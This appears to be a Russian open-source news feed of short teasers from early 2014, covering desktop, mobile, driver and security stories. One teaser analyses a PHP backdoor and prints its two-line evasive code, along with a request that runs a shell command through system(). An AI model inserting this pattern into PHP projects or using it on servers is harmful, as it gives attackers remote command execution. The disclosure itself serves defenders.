Представлен первый тестовый выпуск нового десктоп-окружения Budgie Desktop, построенного поверх технологий GNOME. В рамках проекта развивается несколько написанных на языке Си надстроек, заменяющих GNOME Shell, апплеты и систему управления сеансами. Budgie не является форком GNOME и работает поверх штатных низкоуровневых компонентов и библиотек GNOME. При этом, связанные с интерфейсом пользователя компоненты в Budgie заменены на собственные реализации. Готовые пакеты подготовлены для Fedora 20, openSUSE 13.1 и Arch Linux. Код распространяется под лицензией GPLv2. Основу Budgie составляет панель, близкая по организации работы к классическим панелям рабочего стола. Все элементы панели являются апплетами, что позволяет гибко настраивать состав и заменять реализации основных … Читать далее Первый тестовый выпуск десктоп-окружения Budgie, основанного на технологиях GNOME

Вышла новая версия YAGF, написанной с использованием Qt 4 графической оболочки для программ оптического распознавания текста Cuneiform и Tesseract. Программа позволяет через единый GUI-интерфейс управлять сканированием изображений, их предварительной обработкой и распознаванием большого числа отсканированных страниц. Главным новшеством выпуска является улучшенное качество распознавания плохо отсканированных страниц Читать далее Новая версия оболочки для распознавания текста YAGF 0.9.3

Опубликована одна из самых больших подборок простейших приложений, функции которых ограничены выводом текста «Hello World!». Варианты программы представлены для 113 языков программирования. Дополнение: более полная подборка. Читать далее Реализация программы Hello World на 113 языках программирования

Компания Canonical официально представила первых производителей смартфонов на базе мобильной платформы Ubuntu Touch. Первые модели смартфонов будут выпущены компаниями BQ Mobile (Испания) и Meizu (Китай). При этом, обе компании будут продавать устройства по всему миру через организацию заказов в online, в том числе устройство можно будет заказать с сайта Ubuntu.com. Кроме того, в анонсе упоминается достижение соглашений с 16 крупными сотовыми операторами, среди которых Vodafone, EE, T-Mobile USA, Deutsche Telekom, Verizon, Telstra и Portugal Telecom, которые готовы продавать своим абонентам смартфоны с Ubuntu. Точная дата начала продаж и ориентировочная стоимость устройств будет объявлена 26 февраля на конференции Mobile World Congres. … Читать далее Официально представлены первые производители смартфонов на базе Ubuntu

Компания Яндекс представила Yandex.Kit, собственный вариант прошивки на базе платформы Android, отличающийся оптимизацией для русскоязычных пользователей и тесной интеграцией с сервисами компании (поиск, карта, почта, диск и т.п.). Вместо привязки с аккаунту Google в Yandex.Kit осуществляется привязка к аккаунту пользователя в Yandex, в качетсве каталога-магазина предустановлен Яндекс.Store (Google Play не поддерживается). Первые смартфоны с прошивкой Yandex.Kit будут выпущены компаниями Huawei и Explay, и поступят в продажу уже весной этого года. Наиболее интересным улучшением является переработанная адресная книга, в которой добавлены средства для определения неизвестного номера в справочнике организаций, поддержка поиска телефона по названию компании, гибкие средства поиска по разным формам … Читать далее Компания Яндекс подготовила собственную прошивку на базе платформы Android

В свете появления спекуляций в отношении привязки GNOME к специфичным возможностям Linux и принуждения к использованию systemd, Маттиас Класен (Matthias Clasen), лидер Fedore Desktop Team и участник GNOME Release Team, пояснил позицию проекта в области портирования на различные системы. Маттиас решительно отвергает, что GNOME не принимает во внимание вопрос переносимости. Маттиас признаёт, что GNOME в основном ориентируется при разработке на обеспечение работы на современных Linux-системах и стремится использовать технологии, которые лучше всего подходят для решения возникающих задач, что, в частности, и приводит к расширению поддержки сервисов systemd, многие из которых являются прямыми потомками ранее используемых механизмов, поставляемых с gnome-settings-daemon. Но, … Читать далее Позиция GNOME в отношении работы на платформах, отличных от Linux

Доступны корректирующие обновления свободного гипервизора Xen — 4.3.2 и 4.2.4, в которых отмечено устранение 14 и 23 уязвимостей, а также исправление порции ошибок, влияющих на стабильность работы. Большинство уязвимостей позволяют инициировать крах или зависание хост-системы из гостевого окружения. Тем не менее, среди уязвимостей имеются 4 проблемы, для которых не исключено повышение привилегий пользователя внутри гостевой системы, а также 3 проблемы, которые потенциально позволяют администратору гостевой системы получить доступ к окружению хост-системы. Читать далее Обновление Xen 4.3.2 и 4.2.4 с устранением уязвимостей

Компания NVIDIA выпустила обновление проприетарного драйвера NVIDIA 331.49, относящегося к категории стабильных веток с длительным сроком поддержки. Драйвер доступен для Linux (ARM, x86, x86_64), FreeBSD (x86, x86_64) и Solaris (x86_64). В новой версии добавлена поддержка GPU GeForce GT 710 и GeForce 825M. В конфигурацию X-сервера добавлена опция «InbandStereoSignaling» для включения/выключения стереосигналов через DisplayPort. Добавлена экспериментальная поддержка визуализации ARGB GLX при одновременном включении композитного режима и Xinerama в X.Org xserver 1.15. Читать далее Выпуск проприетарного драйвера NVIDIA 331.49

Исследователи безопасности обратили внимание на использование незашифрованного HTTP-соединения при проверке наличия обновлений и загрузке zip-файлов программой для установки обновлений для свободной Android-прошивки Cyanogenmod в сочетании с отсутствием верификации загруженных данных по цифровой подписи или контрольной сумме, отдельно получаемой из надёжных источников (контрольная сумма также передаётся по HTTP). Подобная недоработка позволяет организовать MITM-атаку по подмене загружаемого файла на одном из транзитных узлов, через который проходит трафик пользователя. В настоящее время разработчики Cyanogenmod уже обеспечили возможность ручной загрузки обновлений через HTTPS, но доступ к API при проверке обновлений по-прежнему производится через HTTP. В качестве примера атаки по установке подставного обновления, продемонстрирована возможность … Читать далее Система обновления Cyanogenmod подвержена совершению MITM-атак

Представлен новый выпуск популярной утилиты для организации поиска данных в текстовых файлах — GNU Grep 2.17. Наиболее существенным улучшением является проведение заметной оптимизации производительности. Кроме того, в выпуске grep 2.17 прекращена поддержка опции «—mmap», которая давно была переведена в категорию устаревших. При использовании многобайтовых локалей поиск без учёта регистра через «grep -i» по простому шаблону, не содержащему символов » и ‘[‘, теперь выполняется в десять раз быстрее. Поиск с учётом регистра (без опции «-i») для многобайтовых локалей в новом выпуске выполняется в семь раз быстрее при наличии в тексте большого числа совпадений. Читать далее В grep 2.17 кардинально увеличена скорость работы с многобайтовыми кодировками

В декабре группа немецких исследователей сообщила об успешном создании прототипа системы обмена данными между двумя ноутбуками при помощи звукового канала связи, организованного в неслышимом диапазоне частот. Реализация данной системы так и не была открыта, поэтому несколько энтузиастов добились проведения похожего эксперимента используя свободный пакет GNU Radio для цифровой обработки и генерации сигналов. Подготовленный в ходе работы набор патчей к GNU Radio и сценарий проведения эксперимента опубликованы на GitHub. Представленные наработки позволяют организовать TCP/IP туннель между двумя рядом стоящими ноутбуками, используя для передачи данных штатные микрофоны и громкоговорители ноутбуков. Для организации канала связи используется близкий к ультразвуковому диапазон частот, не слышимый … Читать далее Опубликован код для организации передачи данных между ноутбуками в ультразвуковом диапазоне

Объявлено о проведении новой акции «Humble Indie Bundle«, в рамках которой пользователь может получить комплект из 6 многоплатформенных игр в обмен на пожертвование проекту любой суммы. Распространяемые в рамках акции могут работать на платформах Mac OS X, Windows и Linux. В пакет входят следующие игры: Guacamelee! Gold Edition, Dust: An Elysian Tail, The Swapper, Giana Sisters: Twisted Dreams, Antichamber и Monaco: What’s Yours is Mine (две последние игры доступны только перечислившим от $3.84). На момент написания новости собрано уже около 100 тыс. долларов. Средний размер суммы взноса составил $3.84. Средний размер взноса пользователей Linux систем составил $5.29, Mac OS X … Читать далее Одиннадцатая акция Humble Indie Bundle по распространению комплекта игр

Выявлен заслуживающий внимания PHP-бэкдор, активация которого производится без видимого обращения к таким функциям, как «eval», «exec», «system», «assert» и «preg_replace». Вместо явного указания eval и других сразу вызывающих подозрение функций, при установке бэкдора в файле phpinfo.php появляется несколько на первый взгляд неопасных строк: @extract ($_REQUEST); @die ($ctime($atime)); При более вдумчивом просмотре становится ясно, что при помощи функции extract осуществляется создание переменных на основании данных, переданных в составе запроса GET или POST. Конструкция $ctime($atime) по сути является вызовом функции, имя которой хранится в переменной $ctime. Сформировав запрос «/phpinfo.php?ctime=systematime=ls -la» получим вызов функции system() с аргументом «ls -la». Читать далее Необычный способ организации вызова PHP-бэкдора

Разработчики файловых менеджеров столкнулись с появлением в Android 4.4 (KitKat) новых ограничений на доступ приложений, имеющих полномочия WRITE_EXTERNAL_STORAGE, к внешним накопителям. Отныне возможность полного доступа ограничена только первичным накопителем и не применима ко вторичным. Изменение касается только устройств с двойным хранилищем, в которых в роли первичного накопителя выступает встроенная Flash-память, а вторичного — SD-карта. С практической стороны, подобное ограничение не позволяет реализовать полный контроль над SD-картой, например, при использовании непривилегированного файлового менеджера невозможно удалить или записать произвольные данные на SD-карту. Системные приложения могут организовать запись на вторичные накопители при наличии полномочий WRITE_MEDIA_STORAGE, которые не выдаются для пользовательских программ, устанавливаемых из … Читать далее Google ограничил в Android доступ сторонних приложений к внешней SD-карте

По заявлению компании Dell, пользователь может лишиться гарантии на встроенные громкоговорители ноутбуков, если в системе установлен медиапроигрыватель VLC. Причиной подобного шага является наличие в VLC штатной возможности установки громкости, превышающего номинальный уровень. По мнению Dell, установка в VLC завышенного уровня звука может привести к выходу громкоговорителей из строя. Разработчики VLC исключают такую возможность и считают отказ гарантийного восстановления повреждённого громкоговорителя формальным поводом, так как для вывода звука в VLC используется штатный API, не позволяющий превысить номинальный уровень громкости, а усиление производится лишь на уровне декодирования, т.е. виртуально повышается громкость контента, закодированного с пониженным уровнем громкости. В качестве реальной причины называется … Читать далее Использование VLC может привести к потере гарантии на громкоговорители ноутбуков Dell

Разработчики свободного антивирусного пакета ClamAV представили новую упрощённую программу приёма вирусных сигнатур от представителей сообщества. Для приёма сигнатур создан отдельный список рассылки community-sigs, в который достаточно отправить подготовленную сигнатуру, краткое описание и MD5/SHA1/SHA256 хэш примера вредоносного кода для которого подготовлена сигнатура. Непосредственно вредоносное ПО, определяемое сигнатурой, следует отправить отдельно, через специальную форму на сайте. После проверки и возможной доработки для соответствия требованиям проекта сигнатура будет добавлена в антивирусную базу. Читать далее Представлена программа по привлечению сообщества к созданию вирусных сигнатур для ClamAV

Исследователи безопасности обратили внимание на использование незашифрованного HTTP-соединения при проверке наличия обновлений и загрузке zip-файлов программой для установки обновлений для свободной Android-прошивки Cyanogemod в сочетании с отсутствием верификации загруженных данных по цифровой подписи или контрольной сумме, отдельно получаемой из надёжных источников (контрольная сумма также передаётся по HTTP). Подобная недоработка позволяет организовать MITM-атаку по подмене загружаемого файла на одном из транзитных узлов, через который проходит трафик пользователя. В настоящее время разработчики Cyanogemod уже обеспечили возможность ручной загрузки обновлений через HTTPS, но доступ к API при проверке обновлений по-прежнему производится через HTTP. В качестве примера атаки по установке подставного обновления, продемонстрирована возможность … Читать далее Система обновления Cyanogemod подвержена совершению MITM-атак

Проект UALinux представил Ubuntu CyberPack (ALF) 1.0 (Analysis, Logging, Forensics), специализированную Live-сборку Ubuntu Linux с подборкой приложений для выявления скрытых данных, получения и фиксации цифровых доказательств и проведения криминалистического анализа. Дистрибутив позволяет выполнять такие действия, как выявление скрытых и удаленных данных, сбор доказательств по использованию ПК для совершения правонарушений, протоколирование произведенных при осмотре действий. Размер iso-образа 819 Мб. Дистрибутив основан на пакетной базе Ubuntu 12.04.4 и поставляется с пользовательской оболочкой на основе LXDE. Поддерживается работа с различными файловыми системами (ext2/3/4, NTFS, FAT/32, VFAT, exFAT, XFS, BtrFS, UFS, ReiserFS/4, HFS/+, ZFS и д.п), разделами RAID и LVM. По умолчанию все обнаруженные … Читать далее Ubuntu CyberPack (ALF) 1.0

В процессе декомпиляции развиваемой компанией Valve античитерской системы Steam VAC (Valve Anti-Cheat) выявлен факт грубого нарушения приватности, выражающийся в отправке на внешний сервер md5-хешей доменов, к которым обращался пользователь (отправляется содержимое кэша DNS). Проблема выявлена в Windows-версиях системы (содержимое кэша DNS в Windows можно посмотреть командой «ipconfig /displaydns»). В Linux доступ к кэшу DNS зависит от типа применяемого на локальной системе кэширующего сервера (dnsmasq, nscd, bind) и возможен только для суперпользователя после включения специальных отладочных режимов. Читать далее В Steam VAC выявлен факт отправки хэшированного содержимого кэша DNS на внешний сервер

Центр противодействия угрозам в Интернет опубликовал предупреждение о выявлении активности сетевого червя TheMoon, поражающего беспроводные маршрутизаторы Linksys (модели Wireless-N и серии E). Используя для проникновения неисправленную уязвимость червь получает управление на устройстве, загружает исполняемый файл ELF для архитектуры MIPS и запускает процесс сканирования сети на предмет выявления других уязвимых устройств и повторения атаки. Сканирование ограничено 670 сетями (/21 и /24) DSL-провайдеров в разных странах. В случае выявления уязвимого устройства, запускается эксплоит и на осуществляющей сканирование системе кратковременно открывается случайный сетевой порт для отдачи копии бинарного файла с червём. После того как файл загружен, порт закрывается. В файле с червём также … Читать далее Выявлен червь, поражающий неисправленную уязвимость в маршрутизаторах Linksys

Объявлено о переводе актуальной кодовой базы FreeBSD-CURRENT на Clang 3.4 и новые версии сопутствующих библиотек и компонентов LLVM 3.4. Выпуск Clang 3.4 примечателен реализацией всех возможностей чернового варианта будущего стандарта C++1y и существенным увеличением производительности генераторов кода. Сообщается, что добавленные в LLVM 3.4 улучшения позволяют начать интеграцию Clang для дополнительных архитектур FreeBSD, таких как powerpc, mips и arm64. Пользователям и мэйнтейнерам портов рекомендует обратить внимание на более жесткий контроль опций: некоторые ранее игнорируемые флаги, которые не удалось распознать (например, специфичные для GCC опции для тонкой настройки режимов оптимизации), теперь могут привести к выводу ошибки. Читать далее Clang 3.4 интегрирован в кодовую базу FreeBSD